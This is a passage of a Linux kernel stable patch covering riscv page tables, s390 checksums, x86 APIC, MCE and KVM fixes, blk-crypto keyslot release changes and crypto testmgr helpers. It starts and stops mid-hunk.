+ 		send_sig_mceerr(BUS_MCEERR_AR, (void __user *)hva,
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 0f14f4a8d179a..6ebb75a9a6b9f 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -843,8 +843,7 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir,
+-					       uintptr_t fix_fdt_va,
++static void __init create_fdt_early_page_table(uintptr_t fix_fdt_va,
+ 					       uintptr_t dtb_pa)
+ {
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+@@ -1034,8 +1033,7 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir,
+-				    __fix_to_virt(FIX_FDT), dtb_pa);
++	create_fdt_early_page_table(__fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+diff --git a/arch/riscv/mm/ptdump.c b/arch/riscv/mm/ptdump.c
+index 830e7de65e3a3..20a9f991a6d74 100644
+--- a/arch/riscv/mm/ptdump.c
++++ b/arch/riscv/mm/ptdump.c
+@@ -59,10 +59,6 @@ struct ptd_mm_info {
+ };
+ 
+ enum address_markers_idx {
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	FIXMAP_START_NR,
+ 	FIXMAP_END_NR,
+ 	PCI_IO_START_NR,
+@@ -74,6 +70,10 @@ enum address_markers_idx {
+ 	VMALLOC_START_NR,
+ 	VMALLOC_END_NR,
+ 	PAGE_OFFSET_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ #ifdef CONFIG_64BIT
+ 	MODULES_MAPPING_NR,
+ 	KERNEL_MAPPING_NR,
+@@ -82,10 +82,6 @@ enum address_markers_idx {
+ };
+ 
+ static struct addr_marker address_markers[] = {
+-#ifdef CONFIG_KASAN
+-	{0, "Kasan shadow start"},
+-	{0, "Kasan shadow end"},
+-#endif
+ 	{0, "Fixmap start"},
+ 	{0, "Fixmap end"},
+ 	{0, "PCI I/O start"},
+@@ -97,6 +93,10 @@ static struct addr_marker address_markers[] = {
+ 	{0, "vmalloc() area"},
+ 	{0, "vmalloc() end"},
+ 	{0, "Linear mapping"},
++#ifdef CONFIG_KASAN
++	{0, "Kasan shadow start"},
++	{0, "Kasan shadow end"},
++#endif
+ #ifdef CONFIG_64BIT
+ 	{0, "Modules/BPF mapping"},
+ 	{0, "Kernel mapping"},
+@@ -362,10 +362,6 @@ static int __init ptdump_init(void)
+ {
+ 	unsigned int i, j;
+ 
+-#ifdef CONFIG_KASAN
+-	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
+-	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
+-#endif
+ 	address_markers[FIXMAP_START_NR].start_address = FIXADDR_START;
+ 	address_markers[FIXMAP_END_NR].start_address = FIXADDR_TOP;
+ 	address_markers[PCI_IO_START_NR].start_address = PCI_IO_START;
+@@ -377,6 +373,10 @@ static int __init ptdump_init(void)
+ 	address_markers[VMALLOC_START_NR].start_address = VMALLOC_START;
+ 	address_markers[VMALLOC_END_NR].start_address = VMALLOC_END;
+ 	address_markers[PAGE_OFFSET_NR].start_address = PAGE_OFFSET;
++#ifdef CONFIG_KASAN
++	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
++	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
++#endif
+ #ifdef CONFIG_64BIT
+ 	address_markers[MODULES_MAPPING_NR].start_address = MODULES_VADDR;
+ 	address_markers[KERNEL_MAPPING_NR].start_address = kernel_map.virt_addr;
+diff --git a/arch/s390/Kconfig b/arch/s390/Kconfig
+index 7fd08755a1f9e..854a6581d2f90 100644
+--- a/arch/s390/Kconfig
++++ b/arch/s390/Kconfig
+@@ -26,10 +26,6 @@ config GENERIC_BUG
+ config GENERIC_BUG_RELATIVE_POINTERS
+ 	def_bool y
+ 
+-config GENERIC_CSUM
+-	bool
+-	default y if KASAN
+-
+ config GENERIC_LOCKBREAK
+ 	def_bool y if PREEMPTION
+ 
+diff --git a/arch/s390/include/asm/checksum.h b/arch/s390/include/asm/checksum.h
+index d977a3a2f6190..1b6b992cf18ed 100644
+--- a/arch/s390/include/asm/checksum.h
++++ b/arch/s390/include/asm/checksum.h
+@@ -12,12 +12,7 @@
+ #ifndef _S390_CHECKSUM_H
+ #define _S390_CHECKSUM_H
+ 
+-#ifdef CONFIG_GENERIC_CSUM
+-
+-#include <asm-generic/checksum.h>
+-
+-#else /* CONFIG_GENERIC_CSUM */
+-
++#include <linux/kasan-checks.h>
+ #include <linux/uaccess.h>
+ #include <linux/in6.h>
+ 
+@@ -40,6 +35,7 @@ static inline __wsum csum_partial(const void *buff, int len, __wsum sum)
+ 		.odd = (unsigned long) len,
+ 	};
+ 
++	kasan_check_read(buff, len);
+ 	asm volatile(
+ 		"0:	cksm	%[sum],%[rp]\n"
+ 		"	jo	0b\n"
+@@ -135,5 +131,4 @@ static inline __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ 	return csum_fold((__force __wsum)(sum >> 32));
+ }
+ 
+-#endif /* CONFIG_GENERIC_CSUM */
+ #endif /* _S390_CHECKSUM_H */
+diff --git a/arch/sh/kernel/cpu/sh4/sq.c b/arch/sh/kernel/cpu/sh4/sq.c
+index a76b94e41e913..8ddfe9989f5fc 100644
+--- a/arch/sh/kernel/cpu/sh4/sq.c
++++ b/arch/sh/kernel/cpu/sh4/sq.c
+@@ -382,7 +382,7 @@ static int __init sq_api_init(void)
+ 	if (unlikely(!sq_cache))
+ 		return ret;
+ 
+-	sq_bitmap = kzalloc(size, GFP_KERNEL);
++	sq_bitmap = kcalloc(size, sizeof(long), GFP_KERNEL);
+ 	if (unlikely(!sq_bitmap))
+ 		goto out;
+ 
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index cbaf174d8efd9..b3af2d45bbbb5 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -125,6 +125,8 @@
+ 
+ #define INTEL_FAM6_LUNARLAKE_M		0xBD
+ 
++#define INTEL_FAM6_ARROWLAKE		0xC6
++
+ /* "Small Core" Processors (Atom/E-Core) */
+ 
+ #define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index 20d9a604da7c4..7705571100518 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -422,10 +422,9 @@ static unsigned int reserve_eilvt_offset(int offset, unsigned int new)
+ 		if (vector && !eilvt_entry_is_changeable(vector, new))
+ 			/* may not change if vectors are different */
+ 			return rsvd;
+-		rsvd = atomic_cmpxchg(&eilvt_offsets[offset], rsvd, new);
+-	} while (rsvd != new);
++	} while (!atomic_try_cmpxchg(&eilvt_offsets[offset], &rsvd, new));
+ 
+-	rsvd &= ~APIC_EILVT_MASKED;
++	rsvd = new & ~APIC_EILVT_MASKED;
+ 	if (rsvd && rsvd != vector)
+ 		pr_info("LVT offset %d assigned for vector 0x%02x\n",
+ 			offset, rsvd);
+diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
+index a868b76cd3d42..efa87b6bb1cde 100644
+--- a/arch/x86/kernel/apic/io_apic.c
++++ b/arch/x86/kernel/apic/io_apic.c
+@@ -2480,17 +2480,21 @@ static int io_apic_get_redir_entries(int ioapic)
+ 
+ unsigned int arch_dynirq_lower_bound(unsigned int from)
+ {
++	unsigned int ret;
++
+ 	/*
+ 	 * dmar_alloc_hwirq() may be called before setup_IO_APIC(), so use
+ 	 * gsi_top if ioapic_dynirq_base hasn't been initialized yet.
+ 	 */
+-	if (!ioapic_initialized)
+-		return gsi_top;
++	ret = ioapic_dynirq_base ? : gsi_top;
++
+ 	/*
+-	 * For DT enabled machines ioapic_dynirq_base is irrelevant and not
+-	 * updated. So simply return @from if ioapic_dynirq_base == 0.
++	 * For DT enabled machines ioapic_dynirq_base is irrelevant and
++	 * always 0. gsi_top can be 0 if there is no IO/APIC registered.
++	 * 0 is an invalid interrupt number for dynamic allocations. Return
++	 * @from instead.
+ 	 */
+-	return ioapic_dynirq_base ? : from;
++	return ret ? : from;
+ }
+ 
+ #ifdef CONFIG_X86_32
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 10fb5b5c9efa4..5518272061bfb 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -235,10 +235,10 @@ static DEFINE_PER_CPU(struct threshold_bank **, threshold_banks);
+  * A list of the banks enabled on each logical CPU. Controls which respective
+  * descriptors to initialize later in mce_threshold_create_device().
+  */
+-static DEFINE_PER_CPU(unsigned int, bank_map);
++static DEFINE_PER_CPU(u64, bank_map);
+ 
+ /* Map of banks that have more than MCA_MISC0 available. */
+-static DEFINE_PER_CPU(u32, smca_misc_banks_map);
++static DEFINE_PER_CPU(u64, smca_misc_banks_map);
+ 
+ static void amd_threshold_interrupt(void);
+ static void amd_deferred_error_interrupt(void);
+@@ -267,7 +267,7 @@ static void smca_set_misc_banks_map(unsigned int bank, unsigned int cpu)
+ 		return;
+ 
+ 	if (low & MASK_BLKPTR_LO)
+-		per_cpu(smca_misc_banks_map, cpu) |= BIT(bank);
++		per_cpu(smca_misc_banks_map, cpu) |= BIT_ULL(bank);
+ 
+ }
+ 
+@@ -528,7 +528,7 @@ static u32 smca_get_block_address(unsigned int bank, unsigned int block,
+ 	if (!block)
+ 		return MSR_AMD64_SMCA_MCx_MISC(bank);
+ 
+-	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT(bank)))
++	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT_ULL(bank)))
+ 		return 0;
+ 
+ 	return MSR_AMD64_SMCA_MCx_MISCy(bank, block - 1);
+@@ -572,7 +572,7 @@ prepare_threshold_block(unsigned int bank, unsigned int block, u32 addr,
+ 	int new;
+ 
+ 	if (!block)
+-		per_cpu(bank_map, cpu) |= (1 << bank);
++		per_cpu(bank_map, cpu) |= BIT_ULL(bank);
+ 
+ 	memset(&b, 0, sizeof(b));
+ 	b.cpu			= cpu;
+@@ -884,7 +884,7 @@ static void amd_threshold_interrupt(void)
+ 		return;
+ 
+ 	for (bank = 0; bank < this_cpu_read(mce_num_banks); ++bank) {
+-		if (!(per_cpu(bank_map, cpu) & (1 << bank)))
++		if (!(per_cpu(bank_map, cpu) & BIT_ULL(bank)))
+ 			continue;
+ 
+ 		first_block = bp[bank]->blocks;
+@@ -1362,7 +1362,7 @@ int mce_threshold_create_device(unsigned int cpu)
+ 		return -ENOMEM;
+ 
+ 	for (bank = 0; bank < numbanks; ++bank) {
+-		if (!(this_cpu_read(bank_map) & (1 << bank)))
++		if (!(this_cpu_read(bank_map) & BIT_ULL(bank)))
+ 			continue;
+ 		err = threshold_create_bank(bp, cpu, bank);
+ 		if (err) {
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 46668e2554210..1ce228dc267ae 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -291,12 +291,16 @@ static void __init ms_hyperv_init_platform(void)
+ 	 * To mirror what Windows does we should extract CPU management
+ 	 * features and use the ReservedIdentityBit to detect if Linux is the
+ 	 * root partition. But that requires negotiating CPU management
+-	 * interface (a process to be finalized).
++	 * interface (a process to be finalized). For now, use the privilege
++	 * flag as the indicator for running as root.
+ 	 *
+-	 * For now, use the privilege flag as the indicator for running as
+-	 * root.
++	 * Hyper-V should never specify running as root and as a Confidential
++	 * VM. But to protect against a compromised/malicious Hyper-V trying
++	 * to exploit root behavior to expose Confidential VM memory, ignore
++	 * the root partition setting if also a Confidential VM.
+ 	 */
+-	if (cpuid_ebx(HYPERV_CPUID_FEATURES) & HV_CPU_MANAGEMENT) {
++	if ((ms_hyperv.priv_high & HV_CPU_MANAGEMENT) &&
++	    !(ms_hyperv.priv_high & HV_ISOLATION)) {
+ 		hv_root_partition = true;
+ 		pr_info("Hyper-V: running as root partition\n");
+ 	}
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index cb547a0833812..53034045cb6e6 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -7749,9 +7749,11 @@ static u64 vmx_get_perf_capabilities(void)
+ 	if (boot_cpu_has(X86_FEATURE_PDCM))
+ 		rdmsrl(MSR_IA32_PERF_CAPABILITIES, host_perf_cap);
+ 
+-	x86_perf_get_lbr(&lbr);
+-	if (lbr.nr)
+-		perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
++	if (!cpu_feature_enabled(X86_FEATURE_ARCH_LBR)) {
++		x86_perf_get_lbr(&lbr);
++		if (lbr.nr)
++			perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
++	}
+ 
+ 	if (vmx_pebs_supported()) {
+ 		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
+@@ -7891,6 +7893,21 @@ static int vmx_check_intercept(struct kvm_vcpu *vcpu,
+ 		/* FIXME: produce nested vmexit and return X86EMUL_INTERCEPTED.  */
+ 		break;
+ 
++	case x86_intercept_pause:
++		/*
++		 * PAUSE is a single-byte NOP with a REPE prefix, i.e. collides
++		 * with vanilla NOPs in the emulator.  Apply the interception
++		 * check only to actual PAUSE instructions.  Don't check
++		 * PAUSE-loop-exiting, software can't expect a given PAUSE to
++		 * exit, i.e. KVM is within its rights to allow L2 to execute
++		 * the PAUSE.
++		 */
++		if ((info->rep_prefix != REPE_PREFIX) ||
++		    !nested_cpu_has2(vmcs12, CPU_BASED_PAUSE_EXITING))
++			return X86EMUL_CONTINUE;
++
++		break;
++
+ 	/* TODO: check more intercepts... */
+ 	default:
+ 		break;
+diff --git a/block/blk-crypto-internal.h b/block/blk-crypto-internal.h
+index a8cdaf26851e1..4f1de2495f0c3 100644
+--- a/block/blk-crypto-internal.h
++++ b/block/blk-crypto-internal.h
+@@ -65,6 +65,11 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return rq->crypt_ctx;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return rq->crypt_keyslot;
++}
++
+ blk_status_t blk_crypto_get_keyslot(struct blk_crypto_profile *profile,
+ 				    const struct blk_crypto_key *key,
+ 				    struct blk_crypto_keyslot **slot_ptr);
+@@ -119,6 +124,11 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return false;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return false;
++}
++
+ #endif /* CONFIG_BLK_INLINE_ENCRYPTION */
+ 
+ void __bio_crypt_advance(struct bio *bio, unsigned int bytes);
+@@ -153,14 +163,21 @@ static inline bool blk_crypto_bio_prep(struct bio **bio_ptr)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq);
+-static inline blk_status_t blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq);
++static inline blk_status_t blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return __blk_crypto_init_request(rq);
++		return __blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
++void __blk_crypto_rq_put_keyslot(struct request *rq);
++static inline void blk_crypto_rq_put_keyslot(struct request *rq)
++{
++	if (blk_crypto_rq_has_keyslot(rq))
++		__blk_crypto_rq_put_keyslot(rq);
++}
++
+ void __blk_crypto_free_request(struct request *rq);
+ static inline void blk_crypto_free_request(struct request *rq)
+ {
+@@ -199,7 +216,7 @@ static inline blk_status_t blk_crypto_insert_cloned_request(struct request *rq)
+ {
+ 
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return blk_crypto_init_request(rq);
++		return blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
+diff --git a/block/blk-crypto-profile.c b/block/blk-crypto-profile.c
+index 0307fb0d95d34..3290c03c9918d 100644
+--- a/block/blk-crypto-profile.c
++++ b/block/blk-crypto-profile.c
+@@ -354,28 +354,16 @@ bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
+ 	return true;
+ }
+ 
+-/**
+- * __blk_crypto_evict_key() - Evict a key from a device.
+- * @profile: the crypto profile of the device
+- * @key: the key to evict.  It must not still be used in any I/O.
+- *
+- * If the device has keyslots, this finds the keyslot (if any) that contains the
+- * specified key and calls the driver's keyslot_evict function to evict it.
+- *
+- * Otherwise, this just calls the driver's keyslot_evict function if it is
+- * implemented, passing just the key (without any particular keyslot).  This
+- * allows layered devices to evict the key from their underlying devices.
+- *
+- * Context: Process context. Takes and releases profile->lock.
+- * Return: 0 on success or if there's no keyslot with the specified key, -EBUSY
+- *	   if the keyslot is still in use, or another -errno value on other
+- *	   error.
++/*
++ * This is an internal function that evicts a key from an inline encryption
++ * device that can be either a real device or the blk-crypto-fallback "device".
++ * It is used only by blk_crypto_evict_key(); see that function for details.
+  */
+ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 			   const struct blk_crypto_key *key)
+ {
+ 	struct blk_crypto_keyslot *slot;
+-	int err = 0;
++	int err;
+ 
+ 	if (profile->num_slots == 0) {
+ 		if (profile->ll_ops.keyslot_evict) {
+@@ -389,22 +377,30 @@ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 
+ 	blk_crypto_hw_enter(profile);
+ 	slot = blk_crypto_find_keyslot(profile, key);
+-	if (!slot)
+-		goto out_unlock;
++	if (!slot) {
++		/*
++		 * Not an error, since a key not in use by I/O is not guaranteed
++		 * to be in a keyslot.  There can be more keys than keyslots.
++		 */
++		err = 0;
++		goto out;
++	}
+ 
+ 	if (WARN_ON_ONCE(atomic_read(&slot->slot_refs) != 0)) {
++		/* BUG: key is still in use by I/O */
+ 		err = -EBUSY;
+-		goto out_unlock;
++		goto out_remove;
+ 	}
+ 	err = profile->ll_ops.keyslot_evict(profile, key,
+ 					    blk_crypto_keyslot_index(slot));
+-	if (err)
+-		goto out_unlock;
+-
++out_remove:
++	/*
++	 * Callers free the key even on error, so unlink the key from the hash
++	 * table and clear slot->key even on error.
++	 */
+ 	hlist_del(&slot->hash_node);
+ 	slot->key = NULL;
+-	err = 0;
+-out_unlock:
++out:
+ 	blk_crypto_hw_exit(profile);
+ 	return err;
+ }
+diff --git a/block/blk-crypto.c b/block/blk-crypto.c
+index 45378586151f7..4d760b092deb9 100644
+--- a/block/blk-crypto.c
++++ b/block/blk-crypto.c
+@@ -13,6 +13,7 @@
+ #include <linux/blkdev.h>
+ #include <linux/blk-crypto-profile.h>
+ #include <linux/module.h>
++#include <linux/ratelimit.h>
+ #include <linux/slab.h>
+ 
+ #include "blk-crypto-internal.h"
+@@ -224,27 +225,27 @@ static bool bio_crypt_check_alignment(struct bio *bio)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	return blk_crypto_get_keyslot(rq->q->crypto_profile,
+ 				      rq->crypt_ctx->bc_key,
+ 				      &rq->crypt_keyslot);
+ }
+ 
+-/**
+- * __blk_crypto_free_request - Uninitialize the crypto fields of a request.
+- *
+- * @rq: The request whose crypto fields to uninitialize.
+- *
+- * Completely uninitializes the crypto fields of a request. If a keyslot has
+- * been programmed into some inline encryption hardware, that keyslot is
+- * released. The rq->crypt_ctx is also freed.
+- */
+-void __blk_crypto_free_request(struct request *rq)
++void __blk_crypto_rq_put_keyslot(struct request *rq)
+ {
+ 	blk_crypto_put_keyslot(rq->crypt_keyslot);
++	rq->crypt_keyslot = NULL;
++}
++
++void __blk_crypto_free_request(struct request *rq)
++{
++	/* The keyslot, if one was needed, should have been released earlier. */
++	if (WARN_ON_ONCE(rq->crypt_keyslot))
++		__blk_crypto_rq_put_keyslot(rq);
++
+ 	mempool_free(rq->crypt_ctx, bio_crypt_ctx_pool);
+-	blk_crypto_rq_set_defaults(rq);
++	rq->crypt_ctx = NULL;
+ }
+ 
+ /**
+@@ -399,30 +400,39 @@ int blk_crypto_start_using_key(struct block_device *bdev,
+ }
+ 
+ /**
+- * blk_crypto_evict_key() - Evict a key from any inline encryption hardware
+- *			    it may have been programmed into
+- * @bdev: The block_device who's associated inline encryption hardware this key
+- *     might have been programmed into
+- * @key: The key to evict
++ * blk_crypto_evict_key() - Evict a blk_crypto_key from a block_device
++ * @bdev: a block_device on which I/O using the key may have been done
++ * @key: the key to evict
++ *
++ * For a given block_device, this function removes the given blk_crypto_key from
++ * the keyslot management structures and evicts it from any underlying hardware
++ * keyslot(s) or blk-crypto-fallback keyslot it may have been programmed into.
+  *
+- * Upper layers (filesystems) must call this function to ensure that a key is
+- * evicted from any hardware that it might have been programmed into.  The key
+- * must not be in use by any in-flight IO when this function is called.
++ * Upper layers must call this before freeing the blk_crypto_key.  It must be
++ * called for every block_device the key may have been used on.  The key must no
++ * longer be in use by any I/O when this function is called.
+  *
+- * Return: 0 on success or if the key wasn't in any keyslot; -errno on error.
++ * Context: May sleep.
+  */
+-int blk_crypto_evict_key(struct block_device *bdev,
+-			 const struct blk_crypto_key *key)
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key)
+ {
+ 	struct request_queue *q = bdev_get_queue(bdev);
++	int err;
+ 
+ 	if (blk_crypto_config_supported_natively(bdev, &key->crypto_cfg))
+-		return __blk_crypto_evict_key(q->crypto_profile, key);
+-
++		err = __blk_crypto_evict_key(q->crypto_profile, key);
++	else
++		err = blk_crypto_fallback_evict_key(key);
+ 	/*
+-	 * If the block_device didn't support the key, then blk-crypto-fallback
+-	 * may have been used, so try to evict the key from blk-crypto-fallback.
++	 * An error can only occur here if the key failed to be evicted from a
++	 * keyslot (due to a hardware or driver issue) or is allegedly still in
++	 * use by I/O (due to a kernel bug).  Even in these cases, the key is
++	 * still unlinked from the keyslot management structures, and the caller
++	 * is allowed and expected to free it right away.  There's nothing
++	 * callers can do to handle errors, so just log them and return void.
+ 	 */
+-	return blk_crypto_fallback_evict_key(key);
++	if (err)
++		pr_warn_ratelimited("%pg: error %d evicting key\n", bdev, err);
+ }
+ EXPORT_SYMBOL_GPL(blk_crypto_evict_key);
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index ec7219caea165..5c265791decbd 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -258,6 +258,11 @@ enum {
+ 	VRATE_MIN		= VTIME_PER_USEC * VRATE_MIN_PPM / MILLION,
+ 	VRATE_CLAMP_ADJ_PCT	= 4,
+ 
++	/* switch iff the conditions are met for longer than this */
++	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
++};
++
++enum {
+ 	/* if IOs end up waiting for requests, issue less */
+ 	RQ_WAIT_BUSY_PCT	= 5,
+ 
+@@ -296,9 +301,6 @@ enum {
+ 	/* don't let cmds which take a very long time pin lagging for too long */
+ 	MAX_LAGGING_PERIODS	= 10,
+ 
+-	/* switch iff the conditions are met for longer than this */
+-	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
+-
+ 	/*
+ 	 * Count IO size in 4k pages.  The 12bit shift helps keeping
+ 	 * size-proportional components of cost calculation in closer
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index 808b58129d3e4..efe5504902a32 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -873,6 +873,8 @@ static struct request *attempt_merge(struct request_queue *q,
+ 	if (!blk_discard_mergable(req))
+ 		elv_merge_requests(q, req, next);
+ 
++	blk_crypto_rq_put_keyslot(next);
++
+ 	/*
+ 	 * 'next' is going away, so update stats accordingly
+ 	 */
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 86425167594cf..9f1bafb62973d 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -840,6 +840,12 @@ static void blk_complete_request(struct request *req)
+ 		req->q->integrity.profile->complete_fn(req, total_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	blk_crypto_rq_put_keyslot(req);
++
+ 	blk_account_io_completion(req, total_bytes);
+ 
+ 	do {
+@@ -905,6 +911,13 @@ bool blk_update_request(struct request *req, blk_status_t error,
+ 		req->q->integrity.profile->complete_fn(req, nr_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	if (blk_crypto_rq_has_keyslot(req) && nr_bytes >= blk_rq_bytes(req))
++		__blk_crypto_rq_put_keyslot(req);
++
+ 	if (unlikely(error && !blk_rq_is_passthrough(req) &&
+ 		     !(req->rq_flags & RQF_QUIET)) &&
+ 		     !test_bit(GD_DEAD, &req->q->disk->state)) {
+@@ -1332,7 +1345,7 @@ void blk_execute_rq_nowait(struct request *rq, bool at_head)
+ 	 * device, directly accessing the plug instead of using blk_mq_plug()
+ 	 * should not have any consequences.
+ 	 */
+-	if (current->plug)
++	if (current->plug && !at_head)
+ 		blk_add_rq_to_plug(current->plug, rq);
+ 	else
+ 		blk_mq_sched_insert_request(rq, at_head, true, false);
+@@ -2987,7 +3000,7 @@ void blk_mq_submit_bio(struct bio *bio)
+ 
+ 	blk_mq_bio_to_request(rq, bio, nr_segs);
+ 
+-	ret = blk_crypto_init_request(rq);
++	ret = blk_crypto_rq_get_keyslot(rq);
+ 	if (ret != BLK_STS_OK) {
+ 		bio->bi_status = ret;
+ 		bio_endio(bio);
+diff --git a/block/blk-stat.c b/block/blk-stat.c
+index 2ea01b5c1aca0..da9407b7d4abf 100644
+--- a/block/blk-stat.c
++++ b/block/blk-stat.c
+@@ -189,7 +189,7 @@ void blk_stat_disable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!--q->stats->accounting)
++	if (!--q->stats->accounting && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_clear(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+@@ -200,7 +200,7 @@ void blk_stat_enable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!q->stats->accounting++)
++	if (!q->stats->accounting++ && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_set(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index d08f864f08bee..9de0677b3643d 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -493,7 +493,9 @@ void crypto_unregister_alg(struct crypto_alg *alg)
+ 	if (WARN(ret, "Algorithm %s is not registered", alg->cra_driver_name))
+ 		return;
+ 
+-	BUG_ON(refcount_read(&alg->cra_refcnt) != 1);
++	if (WARN_ON(refcount_read(&alg->cra_refcnt) != 1))
++		return;
++
+ 	if (alg->cra_destroy)
+ 		alg->cra_destroy(alg);
+ 
+diff --git a/crypto/drbg.c b/crypto/drbg.c
+index 982d4ca4526d8..ff4ebbc68efab 100644
+--- a/crypto/drbg.c
++++ b/crypto/drbg.c
+@@ -1546,7 +1546,7 @@ static int drbg_prepare_hrng(struct drbg_state *drbg)
+ 		const int err = PTR_ERR(drbg->jent);
+ 
+ 		drbg->jent = NULL;
+-		if (fips_enabled || err != -ENOENT)
++		if (fips_enabled)
+ 			return err;
+ 		pr_info("DRBG: Continuing without Jitter RNG\n");
+ 	}
+diff --git a/crypto/testmgr.c b/crypto/testmgr.c
+index 4476ac97baa5e..abd91fadd34f7 100644
+--- a/crypto/testmgr.c
++++ b/crypto/testmgr.c
+@@ -852,12 +852,50 @@ static int prepare_keybuf(const u8 *key, unsigned int ksize,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
++/*
++ * The fuzz tests use prandom instead of the normal Linux RNG since they don't
++ * need cryptographically secure random numbers.  This greatly improves the
++ * performance of these tests, especially if they are run before the Linux RNG
++ * has been initialized or if they are run on a lockdep-enabled kernel.
++ */
++
++static inline void init_rnd_state(struct rnd_state *rng)
++{
++	prandom_seed_state(rng, get_random_u64());
++}
++
++static inline u8 prandom_u8(struct rnd_state *rng)
++{
++	return prandom_u32_state(rng);
++}
++
++static inline u32 prandom_u32_below(struct rnd_state *rng, u32 ceil)
++{
++	/*
++	 * This is slightly biased for non-power-of-2 values of 'ceil', but this
++	 * isn't important here.
++	 */
++	return prandom_u32_state(rng) % ceil;
++}
++
++static inline bool prandom_bool(struct rnd_state *rng)
++{
++	return prandom_u32_below(rng, 2);
++}
++
++static inline u32 prandom_u32_inclusive(struct rnd_state *rng,
++					u32 floor, u32 ceil)
++{
